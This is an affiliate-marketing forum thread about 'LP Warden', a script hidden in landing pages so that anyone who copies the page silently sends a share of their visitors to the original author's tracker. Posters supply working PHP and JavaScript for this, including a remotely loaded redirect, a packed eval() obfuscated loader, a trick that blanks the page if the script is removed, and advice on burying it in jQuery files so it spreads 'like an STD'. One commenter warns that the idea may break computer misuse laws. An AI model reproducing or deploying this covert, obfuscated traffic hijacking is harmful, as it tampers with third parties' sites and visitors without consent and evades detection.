EAT A DICK SPYTOOLS! Counter Counter-Intelligence! (50)
Heart-pounding, you wake up in a cold sweat. You look to the clock on your nightstand; it's 4am. Something is wrong, you can feel it. 'No, no, no...' you think to yourself as you scramble out of bed to your computer. You check your stats; they're freakishly fucked, even for the dead of night. Oh God no... Your best angle, that gem that took you weeks to uncover - CVR has tanked.
You go to check your traffic source, and yup, you guessed it. Bids are on the roof.
You've been spied on.
You've been jacked.
-----
Sound like a familiar situation? I bet it does.
That shit SUCKS, bro.
Sure spy tools are convenient, but nobody likes being on the receiving end of the ol "swipe and deploy."
I can relate. I've even had my camps swiped, and I'm not even THAT creative!
After trying to figure out how to better cloak (couldn't crack it), I thought there must be a way to protect your ass better than cloaking...
Then I remembered a fragment of a conversation I overheard at a dinner with the STM crew. This dude there (I didn't know him) hired RUSSIANS to protect his landing pages in a way that siphoned off an unnoticeable amount of traffic each time someone jacked them. He said he was making decent money doing it.
*LIGHTBULB*
Granted I'm no Russian, but I can hack a bit of PHP when the mood strikes.
Well, the mood struck tonight. I literally don't even remember feeling or thinking anything during the few hours I banged this out.
But, it's alive and functional (and stupid simple to implement).
Nowhere near finished, but I figured I'd like to give my STM family first crack at it. Especially you big dogs who constantly get swooped by lowly nubs on the daily. Now you can pimp them for their traffic.
Enter LP Warden.
I explain it all in the readme...
https://github.com/zealous1/LP-Warden
^^^ For real, click that shit. ^^^
Keep fighting the good fight,
Zeal
PS IF THIS DOESN'T DESERVE A THANKS I DON'T FUCKING KNOW WHAT DOES! (subtle ay?)
Click it.
PSS Very interested in speaking with legit coders to take this to the next level. I know exactly what needs to happen and would be happy to work with you to build something amazing.
PSS Any feedback on features you would like to see implemented can be posted here or PM'ed to me. Very open to hear what you guys think about how I should build this out.
I am aware that the #1 thing to improve right now would be making the PHP get called remotely by a file that can be saved to the culprit's computer, ie using Javascript/AJAX to call the PHP file in a way that saves it automatically when they rip it. The benefits here would be an increased likelihood of transfer when ripped by experienced affs, as well as the ability to enable/disable and scale siphon % up at will (and of course building whatever we want from there). I have not figured this out yet. If anyone can get that working, that would be huge because I could then implement the next wave of features!
(Oh and if you're like REALLY wanting to thank me for this you can thank this post too. Only the first one is obligatory though.) 
Well, I haven't stolen a LP so far(and I'm sure I won't), but the ones who steal....they don't remove any code from it? If not, they are fucking stupid...
In the setup instructions I include the best practice for sneaking it under the radar of all but the most pro affs. You can encrypt it within code that breaks the page if they remove it.
...But yeah, most don't.
edit: Also it should be said that in niches that have a super high (daily) copycat rate, the viral potential of this is... huge. Think of an STD spreading thru adult media buys (pun intended). An STD that makes you money. For example, if Besmir popped this on his Google Maps code a few months ago and made it really easy to swipe....... You get it.
That sounds like a freaking great tool. Thanks for sharing!
This kind of tool should definitely be out in the public. I know a lot of people have their own tricks/internal scripts. But the more people that protect their works means, the more people who put in the initial hard work are rewarded.
Your long locks are luxuriously supple.
Nice tech!
One word of warning - if you decide to do anything that involves automatically downloading files to another person's computer without their knowledge, be very careful. That sort of thing could easily run you foul of computer hacking laws, and those are very, very scary and hostile things to be involved with.
For example, the UK's Computer Misuse Act can put you in prison for up to five years. The US's anti-hacking laws are even more harsh.
Consult with a lawyer before putting anything like that out in the wild!
Your current version isn't working how it should, the PHP file can't operate when saved by another person because all the code parsing has already been done on your side. Regardless good going man, I've fixed it up and added a few features!
Here's what this version does:
- Hosts the redirect code on our own server so we can play about with the final values (+ Possibility for adding visitor stats to database)
- If main code removed by a non-coder the page will load blank
- Added obfuscation to make it a little harder to catch on to
First we'll created the 'hosted.php' file and put it on our server.
[PHP]
<?php
// Get some info from the current visitor + add to database
$ip=$_SERVER['REMOTE_ADDR'];
$source=$_SERVER['HTTP_REFERER'];
// Setup main values
$scrub=12;
$LanderBaseDomain = 'YOUR-LANDING-PAGE-BASE-DOMAIN.COM';
$chaChingUrl='http://yourdomain.com/cha-ching.php?subid1='.urlencode($source);
// Don't worry about this
function percentChance($chance){ $randPercent = mt_rand(0,99); return $chance > $randPercent; }
if(percentChance($scrub)){ if (strpos(strtolower($LanderBaseDomain),$source) == false) { echo "window.top.location='$chaChingUrl';"; } }
?>
[/PHP]
Now simply set the location of your hosted.php in the code snippet below
var url='mytracker.com/hosted.php';
var e = document.createElement('script');
e.src = document.location.protocol + url;
e.async = true;
document.getElementsByTagName('body')[0].style.display = "block";
document.getElementsByTagName('head')[0].appendChild(e);
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 4=\'a.b/c.9\';3 e=1.8(\'5\');e.6=1.7.d+4;e.f=l;1.2(\'m\')[0].k(e);1.2(\'g\').h.i=\'j\';',23,23,'|document|getElementsByTagName|var|url|script|src|location|createElement|php|mytracker|com|hosted|protocol||async|body|style|visibility|visible|appendChild|true|head'.split('|'),0,{}))
If you want to make use of the 'hide page on removal of JS' feature add the following line to your CSS:
body{display:none;}
@zealous
Great idea. Thank you!
@snipe
Is there a way to redirect using something other than JavaScript for mobile browsers? I don't know PHP, but I've been researching options since zealous posted this. This is what I found, would this work?
if(...) {
echo '<META HTTP-EQUIV="Refresh" Content="0; URL=http://yourdomain.com/lander.html">'
exit;
}
Yep, PHP can redirect using the header command.
header('Location: http://www.example.com/');
Incidentally, this is also faster than a Javascript or meta redirect.
UPDATED: @caurmen
With the way this script works, that PHP redirect will load the page in as a script, rather than redirect the user.
---
Originally Posted by w3061
* An idea has just come to me - We could encode the PHP as HTML on our landing page so when the copy-cat uploads the html and runs it as a PHP file, our extra bit of code will run. The guy really has to be an idiot to do this though. Here's how that would look (append to head):
<div style='display:none'><? echo "<?php "; ?>
$scrub=12;
$LanderBaseDomain = 'YOUR-LANDING-PAGE-BASE-DOMAIN.COM';
$chaChingUrl='http://yourdomain.com/cha-ching.php?subid1='.urlencode($source);
function percentChance($chance){ $randPercent = mt_rand(0,99); return $chance > $randPercent; }
if(percentChance($scrub)){ if (strpos(strtolower($LanderBaseDomain),$source) == false) {
echo "<META HTTP-EQUIV='Refresh' Content='0; URL=$chaChingUrl'>";
} }
<? echo "?>";></div>
<- wishes he would have taken PHP/JavaScript courses instead of ColdFusion (WTF?)
Here is a source to obfuscate PHP, though you may want to test it only because I've yet to use it.
Originally Posted by w3061
That looks decent, actually, the more I think about it this approach could be a good option for both JS/non-JS.
Only disadvantage of it - Relying on the cat to keep the LP with a PHP ext.
All this is good in theory, really hope it provides a bit of much needed karma for the original creators out there.
Basic stuff that is a waste of time really. Nickycakes tried something like this and it bombed anyway.
taking a screen shot and chopping it up in Photoshop would bypass all of this. But it is still pretty cool.
haven't looked through the code, and I don't know PHP nor JS, but I know you can encrypt url's using a few techniques, not sure if that helps?
Why are you trying to obfuscate the php file? I haven't payed too much attention, but the php is processed on the server side, so to get access to php code you need to get the unprocessed file from the server, which means getting access to the server(hacking).
I haven't really taken a look but is this anything like what I wrote months ago to help with this problem ? http://fitaffiliate.com/2012/10/prot...s-prying-eyes/
A lot of peeps are commenting that culprits will remove the PHP. This is true in many cases, however I have had my landers copied and used with my p202 still intact, so this is way way more under the radar than that. Especially if you can make it call the code from .js that stays with the lander and breaks if removed.
Originally Posted by andy_d
That's why I came up with this.
After speaking with Lorenzo, it seems there are two camps of people who would use tools like this. Camp A are the true alpha dogs who just want their stuff to be as encrypted/hidden as possible and would be looking for a beefed-up version of your code (as I'm sure Lorenzo and others already have in private). Camp B are the ones who desire vengeance on some level, or at least accept copying as a sort of inevitability, and want their work to continue paying them dividends even after it has left their servers and would be looking for a beefed-up version of my code. Your code caters to Camp A; my code caters to Camp B.
Moving forward, I am not going to provide public support on this. I got the feedback I was looking for and am happy to know how the community feels about it.
If there are any hardcore coders or UX/UI peeps who would like to work with me to develop this further, please reach out via PM.
Thanks everyone.
Originally Posted by caurmen
This is merely a server-verification script that you can put on YOUR OWN sites. What other people do in the event they want to use your work as their own is their business.
@pain2k With my solution, If you've got JQuery on your lander there's a 90% chance they are going to use the same JQuery file without checking it for code like this. What did cakes script do?
@wramirez617 Most aff's won't ever take it that far. The thing is they won't be expecting a script like this.
@mothpockets Yea, encrypting the URLs will always help keep this a little more under the radar.
@crysper That's only for the mobile version. It's complicated to explain unless you understand how it all fits together
@andy_D Nah, yours is just a form of cloaking to bypass the possibility of the user even seeing the lander (relying on the fact they're not in the same country).
@zealous The argument by most people is invalid if they take a look at my version I'd suggest people use both A/B approaches.
I laughed way too hard at this concept - brilliant.
Figured it out, great tool!
Duplicate -
Originally Posted by snipe
I think the problem may be in the last line - try replacing
if(percentChance($scrub)){ if (strpos(strtolower($LanderBaseDomain),$source) == false) { echo "window.top.location='$chaChingUrl';" } }
if(percentChance($scrub)){ if (strpos(strtolower($LanderBaseDomain),$source) == false) { echo "window.top.location='{$chaChingUrl}';" } }
If that doesn't work, let me know what the error message is and I shall test further.
Ah, apologies didn't test that code when I wrote it. Looks like I just forgot a semicolon after the echo. I've updated the original post with it added.
Great piece of code, thanks!
I've also got a tip i thought i'd share, some people might already do this but it's an effective way of stopping people from blatantly ripping your stuff.
You'll need a text editor which can search and replace regular expressions, i use Espresso
- Make sure you have 2 copies of your lander, one to keep on your computer for editing later and one for uploading to your server.
- Open up the file you're going to upload and first search for tabs (\t) and leave the replace field empty, hit replace all
- Do the same thing with linebreaks (\n) and hit replace all. You can also do this for 2 spaces.
- This will leave you with your HTML on one single line and makes it a bitch to read properly. Most people will probably not even bother spending time putting it back together.
Originally Posted by hugo
Dreamweaver: Commands->Apply Source Formatting
I even think there's a command in Visual Studio for this too..
Code Beautifiers are also easy to find online. If you're really wanting to be a jerk, try obfuscation, I'm sure there's some tools out there. Just don't be surprised when your page slows down, breaks or isn't cross-browser friendly anymore.
Hi.. this thread is all WAY over my head, but I do have full time programmer that can implement this but since its a few months old I was hoping its still usable. if so, is there any updates on using it as of today? Thanks !
Hello,
I have a problem with calling the hosted.php
var e = document.createElement('script');
e.src = document.location.protocol + url;
e.async = true;
document.getElementsByTagName('body')[0].style.display = "block";
document.getElementsByTagName('head')[0].appendChild(e);
basically... when I add this to my lander... the url that is being called is like this:
thiefdomain.com/mytracker.com/hosted.php
how do you fix something like this?
everything else is perfect except this part...
mytracker.com/hosted.php is ambigious - javascript might perceive that as being a folder so loads it relative to your current page URL?
Try changing it to http://mytracker.com/hosted.php
hi zeno,
I tried that too...
but it only added the http://
Originally Posted by zeno
Ahh yeah looking at the javascript closer I see it has src = protocol + url. Hmm, not sure what the issue is here, but then again I have no idea what you're actually doing - who's guide have you followed? What have you put on your page?
Post you page source code (remove all unnecessary fluff).
I am following snipe's guide...
http://stmforum.com/forum/showthread...l=1#post105750
I like the fact that this code:
var e = document.createElement('script');
e.src = document.location.protocol + url;
e.async = true;
document.getElementsByTagName('body')[0].style.display = "block";
document.getElementsByTagName('head')[0].appendChild(e);
here is a sample source code:
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Cha-Ching</title>
</head>
<body>
<center><img src="http://static.tumblr.com/aospeum/Z6Nm6gd9n/cha-ching.gif" />
<br />
This is your lander. You just reclaimed some traffic.
<br /><br /><br />
<script>
var url='mytracker.com/hosted.php';
var e = document.createElement('script');
e.src = document.location.protocol + url;
e.async = true;
document.getElementsByTagName('body')[0].style.display = "block";
document.getElementsByTagName('head')[0].appendChild(e);
</script>
</body>
</html>
Hmmm, someone who is less of a javascript noob than me will have to pitch in - I threw a quick lander together and am finding the above script doesn't append anything to the <head> tag = no magic.
@superboi You just need to add 'http://' in the URL to get rid of that!
@Zeno Never! The simplest mistakes are often the hardest to spot
Is this rendering for you? http://jsbin.com/yugirodu/1 (could be limited browser support if not)
I dont want to offend you guys but anyone who can a tiny bit javascript and has a bit common sense can defeat your protections. client side protection is nearly always useless... but if it feels right then do it
Originally Posted by swissfactor
I already tried it... in post #34
http://stmforum.com/forum/showthread...l=1#post143786
this is getting frustrating.. lol... I already posted this same question to other forums... like: digitalpoint and warriorforum
and they all say to add: http://
but it isn't working... 
Originally Posted by snipe
@Zeno Never! The simplest mistakes are often the hardest to spot
Is this rendering for you? http://jsbin.com/yugirodu/1 (could be limited browser support if not)
Originally Posted by snipe
Is this rendering for you? http://jsbin.com/yugirodu/1 (could be limited browser support if not)
If you're clever with this type of approach, you can catch out lazy affs.
I had one rip my pages a few days ago and sent them traffic, which a good portion ended up going to me.
I find, if you implement it in such a way that without the code, the page breaks, then they're less likely to just delete the script all together.
So, the original zip files are up to date, or should i grab some of the other codes posted on this thread..? Any FINAL step-by-step guide to get this working?
maybe I'm missing something but wouldn't it be better to swap the arguments in (strpos(strtolower($LanderBaseDomain),$source)
this way $LanderBaseDomain can be simplified to myhomepage.com instead of having to contain what $source will be, e.g. http://myhomepage.com/us/sexpest/4449/f/ each having to be tailored for every LP
Originally Posted by andy_d
Glad to see you guys are still getting value out of this. I will update github if you guys want to consolidate an updated version.
That would be great!
Def put it on GitHub, I am sure quite some people would contribute to make it better.
Hey guys ! Thats a very interesting tool thanks for sharing ! I havent tested it yet , though I have a question:
So , if I set a CPV lab link for a redirect in Lp Warden is there a way to passthrough a keyword to my CPV lab link ?
For example htt://competitor_cpvlab_domain.com/base.php?key=123?keyword=KEYWORD&c2=CATEGORY where KEYWORD and CATEGORY to be passed to http://my_cpvlab_in_lp_wardendomain.com/base.php?key=123?keyword={keyword}&c2={category} ?
Any advice or help/ solution is much appreciated !
Ok, pitching in as well ( 1y+ later )
First of in order to get things a bit more private you can always obfuscate your javascript with a bit of PHP code ( there are libraries out there that can do it ).
One that I started using is similar to this one: http://wiseloop.com
What the PHP library does: it obfuscates your javascript code, ads a bit of safety for off domain usage and makes it a bit impossible to read / modify.
Now using this with the above suggestions would make RIPing landers a bit more difficult for the untrained.
A word of advice tho: do not use the script directly in your URL since it will unnecessarily load your server.
Generate it locally and reference the generated js file. This way it's a simple static js file that is to be served.
Cheerio
Home > Affiliate Marketing Forum >